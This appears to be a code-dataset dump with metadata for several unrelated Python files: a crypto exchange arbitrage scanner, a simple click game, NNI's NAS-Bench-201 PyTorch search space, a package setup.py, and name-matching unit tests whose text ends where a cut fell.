main.py | orgr/arbitrage_bot | 0 | 10347 | <gh_stars>0
import sys
import time
from typing import List
import asyncio
import ccxt.async_support as ccxt
# import ccxt
import itertools
from enum import Enum
class Color(Enum):
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
RESET = '\033[0m'
def colorize(s, color: Color):
# return color.value + s + Color.RESET.value
return "{}{}{}".format(color.value, s, Color.RESET.value)
def green(s):
return colorize(s, Color.GREEN)
def yellow(s):
return colorize(s, Color.YELLOW)
def red(s):
return colorize(s, Color.RED)
class ArbitrageOpportunity(Enum):
NONE = 0
BUY = 1
SELL = 2
def __str__(self):
return self.name
def get_complementary_trade(t: ArbitrageOpportunity):
assert (t != ArbitrageOpportunity.NONE)
return ArbitrageOpportunity.BUY if t == ArbitrageOpportunity.SELL else ArbitrageOpportunity.SELL
class Price:
def __init__(self, exchange, symbol, bid, ask):
self.exchange = exchange
self.symbol = symbol
self.bid = bid
self.ask = ask
def is_opportunity(self, other):
if self.bid > other.ask:
return ArbitrageOpportunity.BUY # buy from other exchange
if self.ask < other.bid:
return ArbitrageOpportunity.SELL # buy from this exchange
return ArbitrageOpportunity.NONE
def compare_prices(p1: Price, p2: Price):
return p1.is_opportunity(p2)
async def get_price(symbol, exchange) -> Price:
orderbook = await exchange.fetch_order_book(symbol, 10)
bid = orderbook['bids'][0][0] if len(orderbook['bids']) > 0 else None
ask = orderbook['asks'][0][0] if len(orderbook['asks']) > 0 else None
# spread = (ask - bid) if (bid and ask) else None
# print(ex.id, 'market price', {'bid': bid, 'ask': ask, 'spread': spread})
if bid is None or ask is None:
return None
return Price(exchange, symbol, float(bid), float(ask))
async def main():
if len(sys.argv) < 3:
print("Usage: python {} <exchange id 1> <exchange id 2> ...".format(sys.argv[0]))
return
exchanges = []
try:
# initialize exchanges
tasks = []
for ex_id in sys.argv[1:]:
try:
ex = getattr(ccxt, ex_id)({'enableRateLimit': True}) # type: ccxt.Exchange
# ex.set_sandbox_mode(enabled=True)
except AttributeError:
print("{} is not supported".format(ex_id))
return
except ccxt.NotSupported:
print("{} paper trading is not supported".format(ex_id))
return
tasks.append(asyncio.create_task(ex.load_markets()))
exchanges.append(ex)
[await t for t in tasks]
all_symbols = [symbol for ex in exchanges for symbol in ex.symbols]
unique_arbitrable_symbols = set([symbol for symbol in all_symbols if all_symbols.count(symbol) > 1])
for symbol in unique_arbitrable_symbols:
tasks = []
for ex in exchanges:
tasks.append(asyncio.create_task(get_price(symbol, ex)))
[await t for t in tasks]
prices = [t.result() for t in tasks]
if len(prices) > 1:
arbitrage_pairs = itertools.combinations(prices, r=2)
for p in arbitrage_pairs:
opportunity = compare_prices(p[0], p[1])
if opportunity != ArbitrageOpportunity.NONE:
print(green("{}: {} from {}, {} from {}".format(symbol, opportunity, p[1].exchange.id,
get_complementary_trade(opportunity),
p[0].exchange.id)))
else:
print(yellow(symbol))
# close all connections on KeyboardInterrupts and errors
finally:
[await ex.close() for ex in exchanges]
if __name__ == '__main__':
asyncio.run(main())
| import sys
import time
from typing import List
import asyncio
import ccxt.async_support as ccxt
# import ccxt
import itertools
from enum import Enum
class Color(Enum):
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
RESET = '\033[0m'
def colorize(s, color: Color):
# return color.value + s + Color.RESET.value
return "{}{}{}".format(color.value, s, Color.RESET.value)
def green(s):
return colorize(s, Color.GREEN)
def yellow(s):
return colorize(s, Color.YELLOW)
def red(s):
return colorize(s, Color.RED)
class ArbitrageOpportunity(Enum):
NONE = 0
BUY = 1
SELL = 2
def __str__(self):
return self.name
def get_complementary_trade(t: ArbitrageOpportunity):
assert (t != ArbitrageOpportunity.NONE)
return ArbitrageOpportunity.BUY if t == ArbitrageOpportunity.SELL else ArbitrageOpportunity.SELL
class Price:
def __init__(self, exchange, symbol, bid, ask):
self.exchange = exchange
self.symbol = symbol
self.bid = bid
self.ask = ask
def is_opportunity(self, other):
if self.bid > other.ask:
return ArbitrageOpportunity.BUY # buy from other exchange
if self.ask < other.bid:
return ArbitrageOpportunity.SELL # buy from this exchange
return ArbitrageOpportunity.NONE
def compare_prices(p1: Price, p2: Price):
return p1.is_opportunity(p2)
async def get_price(symbol, exchange) -> Price:
orderbook = await exchange.fetch_order_book(symbol, 10)
bid = orderbook['bids'][0][0] if len(orderbook['bids']) > 0 else None
ask = orderbook['asks'][0][0] if len(orderbook['asks']) > 0 else None
# spread = (ask - bid) if (bid and ask) else None
# print(ex.id, 'market price', {'bid': bid, 'ask': ask, 'spread': spread})
if bid is None or ask is None:
return None
return Price(exchange, symbol, float(bid), float(ask))
async def main():
if len(sys.argv) < 3:
print("Usage: python {} <exchange id 1> <exchange id 2> ...".format(sys.argv[0]))
return
exchanges = []
try:
# initialize exchanges
tasks = []
for ex_id in sys.argv[1:]:
try:
ex = getattr(ccxt, ex_id)({'enableRateLimit': True}) # type: ccxt.Exchange
# ex.set_sandbox_mode(enabled=True)
except AttributeError:
print("{} is not supported".format(ex_id))
return
except ccxt.NotSupported:
print("{} paper trading is not supported".format(ex_id))
return
tasks.append(asyncio.create_task(ex.load_markets()))
exchanges.append(ex)
[await t for t in tasks]
all_symbols = [symbol for ex in exchanges for symbol in ex.symbols]
unique_arbitrable_symbols = set([symbol for symbol in all_symbols if all_symbols.count(symbol) > 1])
for symbol in unique_arbitrable_symbols:
tasks = []
for ex in exchanges:
tasks.append(asyncio.create_task(get_price(symbol, ex)))
[await t for t in tasks]
prices = [t.result() for t in tasks]
if len(prices) > 1:
arbitrage_pairs = itertools.combinations(prices, r=2)
for p in arbitrage_pairs:
opportunity = compare_prices(p[0], p[1])
if opportunity != ArbitrageOpportunity.NONE:
print(green("{}: {} from {}, {} from {}".format(symbol, opportunity, p[1].exchange.id,
get_complementary_trade(opportunity),
p[0].exchange.id)))
else:
print(yellow(symbol))
# close all connections on KeyboardInterrupts and errors
finally:
[await ex.close() for ex in exchanges]
if __name__ == '__main__':
asyncio.run(main()) | en | 0.631917 | # import ccxt # return color.value + s + Color.RESET.value # buy from other exchange # buy from this exchange # spread = (ask - bid) if (bid and ask) else None # print(ex.id, 'market price', {'bid': bid, 'ask': ask, 'spread': spread}) # initialize exchanges # type: ccxt.Exchange # ex.set_sandbox_mode(enabled=True) # close all connections on KeyboardInterrupts and errors | 2.770407 | 3 |
examples/click-ninja/clickninja-final.py | predicatemike/predigame | 0 | 10348 | WIDTH = 20
HEIGHT = 14
TITLE = 'Click Ninja'
BACKGROUND = 'board'
def destroy(s):
sound('swoosh')
if s.name == 'taco':
score(50)
else:
score(5)
# draw a splatting image at the center position of the image
image('redsplat', center=s.event_pos, size=2).fade(1.0)
s.fade(0.25)
def failure(s):
score(-20)
if s.name == 'bomb':
s.destroy()
image('explode', center=s.center, size=10).pulse(0.05)
if s.name == 'bomb' or score() < 0:
sound('scream')
text('You Survived %s seconds' % time(), MAROON)
callback(gameover, 0.01)
def spawn():
speed = randint(2, 10)
size = randint(1,4)
target = choice(['bananas', 'cherries',
'olives', 'ham', 'hotdog',
'fries','icee', 'pizza'])
if randint(1, 4) == 2:
target = 'bomb'
if randint(1, 10) == 5:
target = 'taco'
sound('launch')
arc = rand_arc()
s = image(target, arc[0], size=size)
if target == 'bomb':
s.speed(speed).spin(1).clicked(failure)
s.move_to(arc[1], arc[2], callback = s.destroy)
elif target == 'taco':
s.speed(5).spin().clicked(destroy)
s.move_to((-10, -2), (-5, HEIGHT/2), (WIDTH+1, HEIGHT/2), callback = s.destroy)
else:
s.speed(speed).clicked(destroy)
s.move_to(arc[1], arc[2], callback = lambda: failure(s))
callback(spawn, rand(0.1, 3))
score(color = PURPLE)
callback(spawn, 1)
keydown('r', reset)
| WIDTH = 20
HEIGHT = 14
TITLE = 'Click Ninja'
BACKGROUND = 'board'
def destroy(s):
sound('swoosh')
if s.name == 'taco':
score(50)
else:
score(5)
# draw a splatting image at the center position of the image
image('redsplat', center=s.event_pos, size=2).fade(1.0)
s.fade(0.25)
def failure(s):
score(-20)
if s.name == 'bomb':
s.destroy()
image('explode', center=s.center, size=10).pulse(0.05)
if s.name == 'bomb' or score() < 0:
sound('scream')
text('You Survived %s seconds' % time(), MAROON)
callback(gameover, 0.01)
def spawn():
speed = randint(2, 10)
size = randint(1,4)
target = choice(['bananas', 'cherries',
'olives', 'ham', 'hotdog',
'fries','icee', 'pizza'])
if randint(1, 4) == 2:
target = 'bomb'
if randint(1, 10) == 5:
target = 'taco'
sound('launch')
arc = rand_arc()
s = image(target, arc[0], size=size)
if target == 'bomb':
s.speed(speed).spin(1).clicked(failure)
s.move_to(arc[1], arc[2], callback = s.destroy)
elif target == 'taco':
s.speed(5).spin().clicked(destroy)
s.move_to((-10, -2), (-5, HEIGHT/2), (WIDTH+1, HEIGHT/2), callback = s.destroy)
else:
s.speed(speed).clicked(destroy)
s.move_to(arc[1], arc[2], callback = lambda: failure(s))
callback(spawn, rand(0.1, 3))
score(color = PURPLE)
callback(spawn, 1)
keydown('r', reset)
| en | 0.850029 | # draw a splatting image at the center position of the image | 3.088893 | 3 |
nni/retiarii/hub/pytorch/nasbench201.py | nbl97/nni | 2,305 | 10349 | # Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from typing import Callable, Dict
import torch
import torch.nn as nn
from nni.retiarii import model_wrapper
from nni.retiarii.nn.pytorch import NasBench201Cell
__all__ = ['NasBench201']
OPS_WITH_STRIDE = {
'none': lambda C_in, C_out, stride: Zero(C_in, C_out, stride),
'avg_pool_3x3': lambda C_in, C_out, stride: Pooling(C_in, C_out, stride, 'avg'),
'max_pool_3x3': lambda C_in, C_out, stride: Pooling(C_in, C_out, stride, 'max'),
'conv_3x3': lambda C_in, C_out, stride: ReLUConvBN(C_in, C_out, (3, 3), (stride, stride), (1, 1), (1, 1)),
'conv_1x1': lambda C_in, C_out, stride: ReLUConvBN(C_in, C_out, (1, 1), (stride, stride), (0, 0), (1, 1)),
'skip_connect': lambda C_in, C_out, stride: nn.Identity() if stride == 1 and C_in == C_out
else FactorizedReduce(C_in, C_out, stride),
}
PRIMITIVES = ['none', 'skip_connect', 'conv_1x1', 'conv_3x3', 'avg_pool_3x3']
class ReLUConvBN(nn.Module):
def __init__(self, C_in, C_out, kernel_size, stride, padding, dilation):
super(ReLUConvBN, self).__init__()
self.op = nn.Sequential(
nn.ReLU(inplace=False),
nn.Conv2d(C_in, C_out, kernel_size, stride=stride,
padding=padding, dilation=dilation, bias=False),
nn.BatchNorm2d(C_out)
)
def forward(self, x):
return self.op(x)
class SepConv(nn.Module):
def __init__(self, C_in, C_out, kernel_size, stride, padding, dilation):
super(SepConv, self).__init__()
self.op = nn.Sequential(
nn.ReLU(inplace=False),
nn.Conv2d(C_in, C_in, kernel_size=kernel_size, stride=stride,
padding=padding, dilation=dilation, groups=C_in, bias=False),
nn.Conv2d(C_in, C_out, kernel_size=1, padding=0, bias=False),
nn.BatchNorm2d(C_out),
)
def forward(self, x):
return self.op(x)
class Pooling(nn.Module):
def __init__(self, C_in, C_out, stride, mode):
super(Pooling, self).__init__()
if C_in == C_out:
self.preprocess = None
else:
self.preprocess = ReLUConvBN(C_in, C_out, 1, 1, 0, 1)
if mode == 'avg':
self.op = nn.AvgPool2d(3, stride=stride, padding=1, count_include_pad=False)
elif mode == 'max':
self.op = nn.MaxPool2d(3, stride=stride, padding=1)
else:
raise ValueError('Invalid mode={:} in Pooling'.format(mode))
def forward(self, x):
if self.preprocess:
x = self.preprocess(x)
return self.op(x)
class Zero(nn.Module):
def __init__(self, C_in, C_out, stride):
super(Zero, self).__init__()
self.C_in = C_in
self.C_out = C_out
self.stride = stride
self.is_zero = True
def forward(self, x):
if self.C_in == self.C_out:
if self.stride == 1:
return x.mul(0.)
else:
return x[:, :, ::self.stride, ::self.stride].mul(0.)
else:
shape = list(x.shape)
shape[1] = self.C_out
zeros = x.new_zeros(shape, dtype=x.dtype, device=x.device)
return zeros
class FactorizedReduce(nn.Module):
def __init__(self, C_in, C_out, stride):
super(FactorizedReduce, self).__init__()
self.stride = stride
self.C_in = C_in
self.C_out = C_out
self.relu = nn.ReLU(inplace=False)
if stride == 2:
C_outs = [C_out // 2, C_out - C_out // 2]
self.convs = nn.ModuleList()
for i in range(2):
self.convs.append(nn.Conv2d(C_in, C_outs[i], 1, stride=stride, padding=0, bias=False))
self.pad = nn.ConstantPad2d((0, 1, 0, 1), 0)
else:
raise ValueError('Invalid stride : {:}'.format(stride))
self.bn = nn.BatchNorm2d(C_out)
def forward(self, x):
x = self.relu(x)
y = self.pad(x)
out = torch.cat([self.convs[0](x), self.convs[1](y[:, :, 1:, 1:])], dim=1)
out = self.bn(out)
return out
class ResNetBasicblock(nn.Module):
def __init__(self, inplanes, planes, stride):
super(ResNetBasicblock, self).__init__()
assert stride == 1 or stride == 2, 'invalid stride {:}'.format(stride)
self.conv_a = ReLUConvBN(inplanes, planes, 3, stride, 1, 1)
self.conv_b = ReLUConvBN(planes, planes, 3, 1, 1, 1)
if stride == 2:
self.downsample = nn.Sequential(
nn.AvgPool2d(kernel_size=2, stride=2, padding=0),
nn.Conv2d(inplanes, planes, kernel_size=1, stride=1, padding=0, bias=False))
elif inplanes != planes:
self.downsample = ReLUConvBN(inplanes, planes, 1, 1, 0, 1)
else:
self.downsample = None
self.in_dim = inplanes
self.out_dim = planes
self.stride = stride
self.num_conv = 2
def forward(self, inputs):
basicblock = self.conv_a(inputs)
basicblock = self.conv_b(basicblock)
if self.downsample is not None:
inputs = self.downsample(inputs) # residual
return inputs + basicblock
@model_wrapper
class NasBench201(nn.Module):
"""The full search space proposed by `NAS-Bench-201 <https://arxiv.org/abs/2001.00326>`__.
It's a stack of :class:`NasBench201Cell`.
"""
def __init__(self,
stem_out_channels: int = 16,
num_modules_per_stack: int = 5,
num_labels: int = 10):
super().__init__()
self.channels = C = stem_out_channels
self.num_modules = N = num_modules_per_stack
self.num_labels = num_labels
self.stem = nn.Sequential(
nn.Conv2d(3, C, kernel_size=3, padding=1, bias=False),
nn.BatchNorm2d(C)
)
layer_channels = [C] * N + [C * 2] + [C * 2] * N + [C * 4] + [C * 4] * N
layer_reductions = [False] * N + [True] + [False] * N + [True] + [False] * N
C_prev = C
self.cells = nn.ModuleList()
for C_curr, reduction in zip(layer_channels, layer_reductions):
if reduction:
cell = ResNetBasicblock(C_prev, C_curr, 2)
else:
ops: Dict[str, Callable[[int, int], nn.Module]] = {
prim: lambda C_in, C_out: OPS_WITH_STRIDE[prim](C_in, C_out, 1) for prim in PRIMITIVES
}
cell = NasBench201Cell(ops, C_prev, C_curr, label='cell')
self.cells.append(cell)
C_prev = C_curr
self.lastact = nn.Sequential(
nn.BatchNorm2d(C_prev),
nn.ReLU(inplace=True)
)
self.global_pooling = nn.AdaptiveAvgPool2d(1)
self.classifier = nn.Linear(C_prev, self.num_labels)
def forward(self, inputs):
feature = self.stem(inputs)
for cell in self.cells:
feature = cell(feature)
out = self.lastact(feature)
out = self.global_pooling(out)
out = out.view(out.size(0), -1)
logits = self.classifier(out)
return logits
| # Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from typing import Callable, Dict
import torch
import torch.nn as nn
from nni.retiarii import model_wrapper
from nni.retiarii.nn.pytorch import NasBench201Cell
__all__ = ['NasBench201']
OPS_WITH_STRIDE = {
'none': lambda C_in, C_out, stride: Zero(C_in, C_out, stride),
'avg_pool_3x3': lambda C_in, C_out, stride: Pooling(C_in, C_out, stride, 'avg'),
'max_pool_3x3': lambda C_in, C_out, stride: Pooling(C_in, C_out, stride, 'max'),
'conv_3x3': lambda C_in, C_out, stride: ReLUConvBN(C_in, C_out, (3, 3), (stride, stride), (1, 1), (1, 1)),
'conv_1x1': lambda C_in, C_out, stride: ReLUConvBN(C_in, C_out, (1, 1), (stride, stride), (0, 0), (1, 1)),
'skip_connect': lambda C_in, C_out, stride: nn.Identity() if stride == 1 and C_in == C_out
else FactorizedReduce(C_in, C_out, stride),
}
PRIMITIVES = ['none', 'skip_connect', 'conv_1x1', 'conv_3x3', 'avg_pool_3x3']
class ReLUConvBN(nn.Module):
def __init__(self, C_in, C_out, kernel_size, stride, padding, dilation):
super(ReLUConvBN, self).__init__()
self.op = nn.Sequential(
nn.ReLU(inplace=False),
nn.Conv2d(C_in, C_out, kernel_size, stride=stride,
padding=padding, dilation=dilation, bias=False),
nn.BatchNorm2d(C_out)
)
def forward(self, x):
return self.op(x)
class SepConv(nn.Module):
def __init__(self, C_in, C_out, kernel_size, stride, padding, dilation):
super(SepConv, self).__init__()
self.op = nn.Sequential(
nn.ReLU(inplace=False),
nn.Conv2d(C_in, C_in, kernel_size=kernel_size, stride=stride,
padding=padding, dilation=dilation, groups=C_in, bias=False),
nn.Conv2d(C_in, C_out, kernel_size=1, padding=0, bias=False),
nn.BatchNorm2d(C_out),
)
def forward(self, x):
return self.op(x)
class Pooling(nn.Module):
def __init__(self, C_in, C_out, stride, mode):
super(Pooling, self).__init__()
if C_in == C_out:
self.preprocess = None
else:
self.preprocess = ReLUConvBN(C_in, C_out, 1, 1, 0, 1)
if mode == 'avg':
self.op = nn.AvgPool2d(3, stride=stride, padding=1, count_include_pad=False)
elif mode == 'max':
self.op = nn.MaxPool2d(3, stride=stride, padding=1)
else:
raise ValueError('Invalid mode={:} in Pooling'.format(mode))
def forward(self, x):
if self.preprocess:
x = self.preprocess(x)
return self.op(x)
class Zero(nn.Module):
def __init__(self, C_in, C_out, stride):
super(Zero, self).__init__()
self.C_in = C_in
self.C_out = C_out
self.stride = stride
self.is_zero = True
def forward(self, x):
if self.C_in == self.C_out:
if self.stride == 1:
return x.mul(0.)
else:
return x[:, :, ::self.stride, ::self.stride].mul(0.)
else:
shape = list(x.shape)
shape[1] = self.C_out
zeros = x.new_zeros(shape, dtype=x.dtype, device=x.device)
return zeros
class FactorizedReduce(nn.Module):
def __init__(self, C_in, C_out, stride):
super(FactorizedReduce, self).__init__()
self.stride = stride
self.C_in = C_in
self.C_out = C_out
self.relu = nn.ReLU(inplace=False)
if stride == 2:
C_outs = [C_out // 2, C_out - C_out // 2]
self.convs = nn.ModuleList()
for i in range(2):
self.convs.append(nn.Conv2d(C_in, C_outs[i], 1, stride=stride, padding=0, bias=False))
self.pad = nn.ConstantPad2d((0, 1, 0, 1), 0)
else:
raise ValueError('Invalid stride : {:}'.format(stride))
self.bn = nn.BatchNorm2d(C_out)
def forward(self, x):
x = self.relu(x)
y = self.pad(x)
out = torch.cat([self.convs[0](x), self.convs[1](y[:, :, 1:, 1:])], dim=1)
out = self.bn(out)
return out
class ResNetBasicblock(nn.Module):
def __init__(self, inplanes, planes, stride):
super(ResNetBasicblock, self).__init__()
assert stride == 1 or stride == 2, 'invalid stride {:}'.format(stride)
self.conv_a = ReLUConvBN(inplanes, planes, 3, stride, 1, 1)
self.conv_b = ReLUConvBN(planes, planes, 3, 1, 1, 1)
if stride == 2:
self.downsample = nn.Sequential(
nn.AvgPool2d(kernel_size=2, stride=2, padding=0),
nn.Conv2d(inplanes, planes, kernel_size=1, stride=1, padding=0, bias=False))
elif inplanes != planes:
self.downsample = ReLUConvBN(inplanes, planes, 1, 1, 0, 1)
else:
self.downsample = None
self.in_dim = inplanes
self.out_dim = planes
self.stride = stride
self.num_conv = 2
def forward(self, inputs):
basicblock = self.conv_a(inputs)
basicblock = self.conv_b(basicblock)
if self.downsample is not None:
inputs = self.downsample(inputs) # residual
return inputs + basicblock
@model_wrapper
class NasBench201(nn.Module):
"""The full search space proposed by `NAS-Bench-201 <https://arxiv.org/abs/2001.00326>`__.
It's a stack of :class:`NasBench201Cell`.
"""
def __init__(self,
stem_out_channels: int = 16,
num_modules_per_stack: int = 5,
num_labels: int = 10):
super().__init__()
self.channels = C = stem_out_channels
self.num_modules = N = num_modules_per_stack
self.num_labels = num_labels
self.stem = nn.Sequential(
nn.Conv2d(3, C, kernel_size=3, padding=1, bias=False),
nn.BatchNorm2d(C)
)
layer_channels = [C] * N + [C * 2] + [C * 2] * N + [C * 4] + [C * 4] * N
layer_reductions = [False] * N + [True] + [False] * N + [True] + [False] * N
C_prev = C
self.cells = nn.ModuleList()
for C_curr, reduction in zip(layer_channels, layer_reductions):
if reduction:
cell = ResNetBasicblock(C_prev, C_curr, 2)
else:
ops: Dict[str, Callable[[int, int], nn.Module]] = {
prim: lambda C_in, C_out: OPS_WITH_STRIDE[prim](C_in, C_out, 1) for prim in PRIMITIVES
}
cell = NasBench201Cell(ops, C_prev, C_curr, label='cell')
self.cells.append(cell)
C_prev = C_curr
self.lastact = nn.Sequential(
nn.BatchNorm2d(C_prev),
nn.ReLU(inplace=True)
)
self.global_pooling = nn.AdaptiveAvgPool2d(1)
self.classifier = nn.Linear(C_prev, self.num_labels)
def forward(self, inputs):
feature = self.stem(inputs)
for cell in self.cells:
feature = cell(feature)
out = self.lastact(feature)
out = self.global_pooling(out)
out = out.view(out.size(0), -1)
logits = self.classifier(out)
return logits
| en | 0.783286 | # Copyright (c) Microsoft Corporation. # Licensed under the MIT license. # residual The full search space proposed by `NAS-Bench-201 <https://arxiv.org/abs/2001.00326>`__. It's a stack of :class:`NasBench201Cell`. | 1.929604 | 2 |
setup.py | Pasha13666/dialog_py | 1 | 10350 | #!/usr/bin/env python3
import os
from setuptools import setup
with open(os.path.join(os.path.dirname(__file__), 'README.rst'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='dialog_py',
version='1.0a1',
description='Python API for cdialog/linux dialog',
long_description=long_description,
url='https://github.com/pasha13666/dialog_py',
author='Pasha__kun',
author_email='<EMAIL>',
packages=['dialog_py'],
install_requires=[],
include_package_data=True,
license='MIT',
classifiers=[
'Development Status :: 3 - Alpha',
'Environment :: Console',
'License :: OSI Approved :: MIT License',
'Operating System :: POSIX',
'Operating System :: POSIX :: Linux',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3 :: Only',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: Implementation :: CPython'
]
)
| #!/usr/bin/env python3
import os
from setuptools import setup
with open(os.path.join(os.path.dirname(__file__), 'README.rst'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='dialog_py',
version='1.0a1',
description='Python API for cdialog/linux dialog',
long_description=long_description,
url='https://github.com/pasha13666/dialog_py',
author='Pasha__kun',
author_email='<EMAIL>',
packages=['dialog_py'],
install_requires=[],
include_package_data=True,
license='MIT',
classifiers=[
'Development Status :: 3 - Alpha',
'Environment :: Console',
'License :: OSI Approved :: MIT License',
'Operating System :: POSIX',
'Operating System :: POSIX :: Linux',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3 :: Only',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: Implementation :: CPython'
]
)
| fr | 0.221828 | #!/usr/bin/env python3 | 1.173689 | 1 |
test/test_who.py | rliebz/whoswho | 28 | 10351 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import unittest
import nose
from nose.tools import *
from whoswho import who, config
from nameparser.config.titles import TITLES as NAMEPARSER_TITLES
class TestMatch(unittest.TestCase):
def setUp(self):
self.name = '<NAME>'
def test_string(self):
# Only relevant for python 2.X
assert_true(who.match(self.name, str('<NAME>')))
def test_unicode(self):
name = self.name
assert_true(who.match(name, '<NAME>'))
assert_true(who.match(name, '<NAME>'))
assert_false(who.match(name, '<NAME>'))
def test_name_and_initials(self):
assert_true(who.match(self.name, '<NAME>'))
assert_true(who.match(self.name, '<NAME>'))
assert_true(who.match(self.name, '<NAME>'))
def test_different_number_initials(self):
assert_true(who.match(self.name, '<NAME>'))
assert_true(who.match(self.name, '<NAME>'))
assert_false(who.match(self.name, '<NAME>'))
assert_false(who.match(self.name, '<NAME>'))
assert_true(who.match('<NAME>', '<NAME>'))
def test_different_initials(self):
assert_false(who.match(self.name, '<NAME>'))
assert_false(who.match(self.name, '<NAME>'))
assert_false(who.match(self.name, '<NAME>'))
assert_false(who.match(self.name, '<NAME>'))
def test_short_names(self):
assert_true(who.match(self.name, '<NAME>'))
# TODO: Should these be true?
assert_false(who.match(self.name, '<NAME>'))
assert_false(who.match(self.name, '<NAME>'))
def test_suffixes(self):
name = '<NAME>'
assert_true(who.match(name, '<NAME>'))
assert_true(who.match(name, '<NAME>r'))
assert_true(who.match(name, '<NAME>, PhD'))
assert_false(who.match(name, '<NAME>, Sr'))
assert_false(who.match(name, '<NAME>, Sr, PhD'))
assert_true(who.match(name, '<NAME>, Jr, PhD'))
def test_equivalent_suffixes(self):
name = '<NAME>r'
assert_true(who.match(name, '<NAME> Jnr'))
assert_false(who.match(name, '<NAME> Snr'))
def test_titles(self):
name = 'Mr. <NAME>'
assert_true(who.match(name, '<NAME>'))
assert_true(who.match(name, 'Sir <NAME>'))
assert_true(who.match(name, 'Dr. <NAME>'))
assert_false(who.match(name, 'Mrs. <NAME>'))
def test_nickname(self):
name = 'Robert "<NAME>'
assert_true(who.match(name, '<NAME>'))
assert_true(who.match('<NAME>', name))
assert_false(who.match(name, '<NAME>'))
assert_false(who.match(name, '<NAME>'))
assert_false(who.match(name, '<NAME>',
options={'check_nickname': False}))
class TestRatio(unittest.TestCase):
def setUp(self):
self.name = '<NAME>'
def test_string(self):
# Only relevant for python 2.X
assert_equal(who.ratio(self.name, str('<NAME>')), 100)
def test_unicode(self):
name = self.name
assert_equal(who.ratio(name, 'attach<NAME>'), 100)
assert_equal(who.ratio(name, '<NAME>'), 100)
assert_true(who.ratio(name, '<NAME>') < 100)
def test_name_and_initials(self):
assert_equal(who.ratio(self.name, '<NAME>'), 100)
assert_equal(who.ratio(self.name, '<NAME>'), 100)
assert_equal(who.ratio(self.name, '<NAME>'), 100)
def test_different_number_initials(self):
assert_equal(who.ratio(self.name, '<NAME>'), 100)
assert_equal(who.ratio(self.name, '<NAME>'), 100)
assert_true(who.ratio(self.name, '<NAME>') < 100)
assert_true(who.ratio(self.name, '<NAME>') < 100)
assert_equal(who.ratio('<NAME>', '<NAME>'), 100)
def test_different_initials(self):
assert_true(who.ratio(self.name, '<NAME>') < 100)
assert_true(who.ratio(self.name, '<NAME>') < 100)
assert_true(who.ratio(self.name, '<NAME>') < 100)
assert_true(who.ratio(self.name, '<NAME>') < 100)
assert_true(who.ratio(self.name, '<NAME>') <
who.ratio(self.name, '<NAME>'))
assert_true(who.ratio(self.name, '<NAME>') <
who.ratio(self.name, '<NAME>'))
assert_true(who.ratio(self.name, '<NAME>') <
who.ratio(self.name, '<NAME>'))
def test_short_names(self):
assert_true(who.ratio(self.name, '<NAME>'))
assert_true(who.ratio(self.name, '<NAME>') < 100)
assert_true(who.ratio(self.name, '<NAME>') < 100)
assert_true(who.ratio(self.name, '<NAME>') <
who.ratio(self.name, '<NAME>'))
def test_suffixes(self):
name = '<NAME>'
assert_equal(who.ratio(name, '<NAME>'), 100)
assert_equal(who.ratio(name, '<NAME>r'), 100)
assert_equal(who.ratio(name, '<NAME>, PhD'), 100)
assert_false(who.ratio(name, '<NAME>, Sr'))
assert_false(who.ratio(name, '<NAME>, Sr, PhD'))
assert_equal(who.ratio(name, '<NAME>, Jr, PhD'), 100)
# Suffix doesn't change a match
assert_equal(who.ratio(name, '<NAME>, Jr'),
who.ratio(name, '<NAME>'))
def test_equivalent_suffixes(self):
name = '<NAME> Jr'
assert_equal(who.ratio(name, '<NAME> Jnr'), 100)
assert_false(who.ratio(name, '<NAME> Snr'))
def test_titles(self):
name = 'Mr. <NAME>'
assert_equal(who.ratio(name, '<NAME>'), 100)
assert_equal(who.ratio(name, 'Sir <NAME>'), 100)
assert_equal(who.ratio(name, 'Dr. <NAME>'), 100)
assert_false(who.ratio(name, 'Mrs. <NAME>'))
# Title doesn't change a match
assert_equal(who.ratio(name, 'Dr. <NAME>'),
who.ratio(name, '<NAME>'))
def test_nickname(self):
name = 'Robert "Evan" Liebowitz'
assert_equal(who.ratio(name, '<NAME>'), 100)
assert_equal(who.ratio('<NAME>', name), 100)
assert_true(who.ratio(name, '<NAME>') < 100)
assert_true(who.ratio(name, '<NAME>') < 100)
assert_true(who.ratio(name, '<NAME>',
options={'check_nickname': False}) < 100)
assert_true(who.ratio(name, '<NAME>') <
who.ratio(name, '<NAME>'))
assert_equal(who.ratio(name, '<NAME>ebowitz'),
who.ratio(name, '<NAME>', 'strict'))
# TODO: Should we ensure that the metadata is up to date?
@nottest
class TestConfig(unittest.TestCase):
def test_titles_all_defined(self):
"""
Check if list of titles is up to date with nameparser
"""
all_titles = (
config.MALE_TITLES |
config.FEMALE_TITLES |
config.GENDERLESS_TITLES
)
assert_equal(all_titles, NAMEPARSER_TITLES)
def test_suffixes_all_defined(self):
"""
Check if list of suffixes is up to date with nameparser
"""
from nameparser.config.suffixes import SUFFIX_ACRONYMS, SUFFIX_NOT_ACRONYMS
all_suffixes = (
config.UNIQUE_SUFFIXES |
config.MISC_SUFFIXES
)
nameparser_suffixes = (
SUFFIX_ACRONYMS |
SUFFIX_NOT_ACRONYMS
)
assert_equal(all_suffixes, nameparser_suffixes)
if __name__ == '__main__':
nose.main()
| # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import unittest
import nose
from nose.tools import *
from whoswho import who, config
from nameparser.config.titles import TITLES as NAMEPARSER_TITLES
class TestMatch(unittest.TestCase):
def setUp(self):
self.name = '<NAME>'
def test_string(self):
# Only relevant for python 2.X
assert_true(who.match(self.name, str('<NAME>')))
def test_unicode(self):
name = self.name
assert_true(who.match(name, '<NAME>'))
assert_true(who.match(name, '<NAME>'))
assert_false(who.match(name, '<NAME>'))
def test_name_and_initials(self):
